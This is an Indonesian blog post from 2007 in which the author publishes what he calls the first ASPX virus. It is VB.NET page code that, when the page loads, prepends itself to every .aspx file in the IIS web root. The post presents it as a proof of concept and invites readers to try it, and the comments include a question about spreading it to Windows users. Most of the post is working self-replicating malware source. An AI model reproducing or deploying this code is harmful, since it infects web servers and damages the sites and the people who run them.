.NET SECURE ENOUGH ? SEE THIS, MY ASPX REPLICATION CODE

January 17, 2007 at 5:07 am (Researchs)

Hohohohohooh
seiring dengan majunya teknologi microsoft maka makin maju
pula teknologi para coder hohohoh mungkin saya salah satunya wakwaw…
Lagi2 tentang pembuktian konsep atau sering disebut ”Proof Of concept” hehehe
I love that sentence, sounds cooL ya gag sih ??

Kemaren gua pusing banget ngerjain aplikasi pesenan

karena ke-MUMET-an gua kemaren akhirnya dateng lagi setan iseng di kepala gua.
gua nyoba2 apa bisa aspx replikasi ? soalnya pada ASp klasik gua dah nyoba dan ASP klasik ga begitu friendly buat replikasi, soalnya untuk baca
independendent path musti hardcode itupun  juga harus membuat sendiri path lewat file DLL, Ok kemaren dalam waktu lumayan singkat
yang gua inget dari jam 2 abis makan siang sampe jam 4-an gw coding tuh program  ASPX sejenis virus, dan akhirnya taraaaaa…… the first one ASPX virus maybe… hoho

—————————————————————————————–

<!– FADLY –>
<html>
<head>
<script language=”VB” runat=”server”>
Sub Page_Load (ByVal Sender As Object, ByVal E As EventArgs)
Try
Dim di As New System.IO.DirectoryInfo(“C:\Inetpub\wwwroot”)
Dim fiArr As System.IO.FileInfo() = di.GetFiles(“*.aspx”)
Dim fri As System.IO.FileInfo
Dim line, file_cont As String
Dim i,IsInf As Integer
Dim VirCode As String = “”
For Each fri In fiArr
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing
file_pointer.Close()
For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then VirCode = file_cont.Substring(i-1, 1613)
Next
Next

For Each fri In fiArr
IsInf=0
file_cont=”"
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing

file_pointer.Close()

For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then IsInf = 1
Next

If IsInf <> 1 Then
Dim file_pointerW As New System.IO.StreamWriter(“C:\Inetpub\wwwroot\”+fri.Name)
file_pointerW.WriteLine(VirCode+Chr(13)+Chr(10)+file_cont)
file_pointerW.Close()
i=file_cont.Length
End If
Next
Catch ex As Exception
End Try
End Sub

</script>
</head>
<body>
<p id=”ausgabe” runat=”server”></p>
</body>
</html>

—————————————————————————————–

Apaan tuh ??

Kode diatas adalah contoh dari aplikasi .NET aspx yang dapat mereplikasi dirinya sendiri ke file lain hohohoh mungkin orang nyebutnya virus, tapi tenang aja itupun prepender kok, no overwrite, jadi dia cuma numpang ( nitipin )  bodynya ke body file ASPX  lain hohohohoho….

Dan satu lagi, kode diatas cuma sebagai pembuktian konsep dan teori dari gw kalo ga ada satupun sistem yang 100% aman, yang saya lakukan hanya membantu microsoft untuk menutupi lubang-lubang tersebut.Ok terima kasih dan..

selamat mencoba.

4 Comments

  1. chaidir said,

    January 17, 2007 at 5:56 am

    yoi…..
    Fadly beraksi lagi dengan virusnya….

    wahai pengguna .NET
    berhati-hatilah… waspadalah!!

    :-d

  2. wadehel said,

    January 17, 2007 at 6:25 am

    Saya pake ubuntu, gimana caranya biar kena? Trus gimana cara menularkannya ke pengguna windwos?

  3. fadly said,

    January 17, 2007 at 6:47 am

    wedehel :

    duh maap kakak, saya lom pernah nyoba ubuntu
    tapi selama ubuntu memakai konsep emulator pasti bisa dijalankan

  4. Pendekar said,

    March 23, 2007 at 11:10 am

    Anda masih dilevel dasar yaaa?

Post a Comment